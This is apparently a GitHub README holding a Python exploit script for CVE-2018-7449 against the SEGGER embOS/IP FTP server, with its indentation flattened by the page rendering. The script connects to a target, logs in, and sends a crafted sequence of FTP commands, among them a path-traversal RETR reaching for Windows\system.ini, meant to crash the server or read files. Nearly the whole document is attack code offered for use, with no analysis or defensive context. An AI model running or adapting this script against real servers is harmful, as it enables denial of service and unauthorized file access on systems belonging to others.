README.md
Rendering markdown...
#!coding=utf-8
#
# [+] this script was created from: antogit-sys *
# [+] URL: https://github.com/antogit-sys/CVE-2018-7449
# [+] LICENSE: GPLv3
#
import ftplib
from time import sleep
class ExploitFTPSegger:
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.ftp = ftplib.FTP()
self.badchars = [
"STOR antogit-sys!",
"LIST",
"RETR '+'..\\'*8+'Windows\system.ini"
]
def connectServer(self):
done = False
try:
done = self.ftp.connect(self.ip, self.port)
sleep(1)
except (ConnectionRefusedError, EOFError, OSError):
pass
return done
def close_connection(self):
self.ftp.close()
def send_usr(self, usr):
return self.ftp.sendcmd("USER "+usr)
def send_passwd(self, passwd):
return self.ftp.sendcmd("PASS "+passwd)
def login(self, username, password):
done = False
try:
usr_done = self.send_usr(username)
passwd_done = self.send_passwd(password)
done = usr_done + "\n"+ passwd_done
except ftplib.error_perm:
pass
return done
def send_badchars(self):
try:
for bc in self.badchars:
self.ftp.sendcmd(bc)
sleep(1)
except (ConnectionResetError, ftplib.error_temp, KeyboardInterrupt):
pass